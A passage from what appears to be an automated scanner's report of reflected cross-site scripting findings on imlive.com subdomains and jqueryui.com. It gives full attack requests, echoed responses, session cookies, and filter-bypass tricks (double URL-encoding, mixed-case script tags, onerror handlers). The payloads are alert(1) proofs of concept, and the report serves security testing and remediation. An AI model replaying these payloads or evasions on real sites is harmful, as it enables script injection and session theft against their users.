HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:53 GMT Connection: close Content-Length: 74955 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-advanced-search/?9af1e"><a>4c3fec81c51=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.568. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/webcam-faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57b4'-alert(1)-'0e1cfcefff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function ...[SNIP]...
4.569. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/webcam-faq/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5762"><a>e3b37a89d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-faq/?a5762"><a>e3b37a89d43=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-faq/?a5762"><a>e3b37a89d43=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.570. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/webcam-login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a901'-alert(1)-'19762fb72eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/?6a901'-alert(1)-'19762fb72eb=1&rf=http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f&qs=6a901'-alert(1)-'19762fb72eb=1&qs=6a901'-alert(1)-'19762fb72eb=1&bd=2257131737&sr=1 ...[SNIP]...
4.571. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/webcam-login/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2bef"><a>297c1fbe51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-login/?f2bef"><a>297c1fbe51b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.572. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/webcam-sign-up/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80602"><a>69f3ca0322b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /webcam-sign-up/?80602"><a>69f3ca0322b=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-sign-up/?80602"><a>69f3ca0322b=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.573. http://imlive.com/webcam-sign-up/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/webcam-sign-up/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5bdfe'-alert(1)-'167f160a9b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-sign-up/?5bdfe'-alert(1)-'167f160a9b3=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f was submitted in the gotopage parameter. This input was echoed as 244f6'><script>alert(1)</script>7358040fd9f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp244f6%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e7358040fd9f&waron=yes&promocode=YZSUSA5583 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
4.575. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://in.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30418"><script>alert(1)</script>eb906244d97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?30418"><script>alert(1)</script>eb906244d97=1 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="hi-IN" lang="hi-IN" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||30418"><script>alert(1)</script>eb906244d97~1');return false;"> ...[SNIP]...
4.576. http://in.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://in.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76f4b'-alert(1)-'bf4b062c8a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?76f4b'-alert(1)-'bf4b062c8a0=1 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload efac5'onerror%3d'alert(1)'f4ba4def511 was submitted in the gotopage parameter. This input was echoed as efac5'onerror='alert(1)'f4ba4def511 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=efac5'onerror%3d'alert(1)'f4ba4def511 HTTP/1.1 Host: in.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:24:50 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iin=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQQSSTATD=NKPDBJMAFMLOCIAIEHIHPIKM; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:24:51 GMT Connection: close Content-Length: 8306 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
4.578. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46421'-alert(1)-'4594a948ef4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?46421'-alert(1)-'4594a948ef4=1 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-IT" lang="it-IT" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815996&ud=0&pe=/homepage.aspx&he=it.imlive.com&ul=/?46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&qs=46421'-alert(1)-'4594a948ef4=1&iy=dallas&id=44&iu=1&vd=a5fa461c-09b7-4606-8bf0-57b4f45b4d27';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach ...[SNIP]...
4.579. http://it.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://it.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e1c9"><a>8cb16e9fe00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?9e1c9"><a>8cb16e9fe00=1 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a32d9'onerror%3d'alert(1)'7223884f696 was submitted in the gotopage parameter. This input was echoed as a32d9'onerror='alert(1)'7223884f696 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the gotopage request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=a32d9'onerror%3d'alert(1)'7223884f696 HTTP/1.1 Host: it.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:04 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: iit=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDQSQSRBSD=HDONOIMAGIIFDHIHJOLHJHAN; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:25:04 GMT Connection: close Content-Length: 8305 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
4.581. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jp.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /?bda08"><ScRiPt>alert(1)</ScRiPt>8bd9e847e0=1 HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja-JP" lang="ja-JP" d ...[SNIP]... <a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||bda08"><script>alert(1)</script>8bd9e847e0~1');return false;"> ...[SNIP]...
4.582. http://jp.imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://jp.imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2e62'-alert(1)-'e87ff225301 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?d2e62'-alert(1)-'e87ff225301=1 HTTP/1.1 Host: jp.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f240"><script>alert(1)</script>f1fb6a82e6a was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff6f240"><script>alert(1)</script>f1fb6a82e6a&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:04:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d42b3"><script>alert(1)</script>68731049f78 was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffffd42b3"><script>alert(1)</script>68731049f78&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 29 Jan 2011 05:00:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067
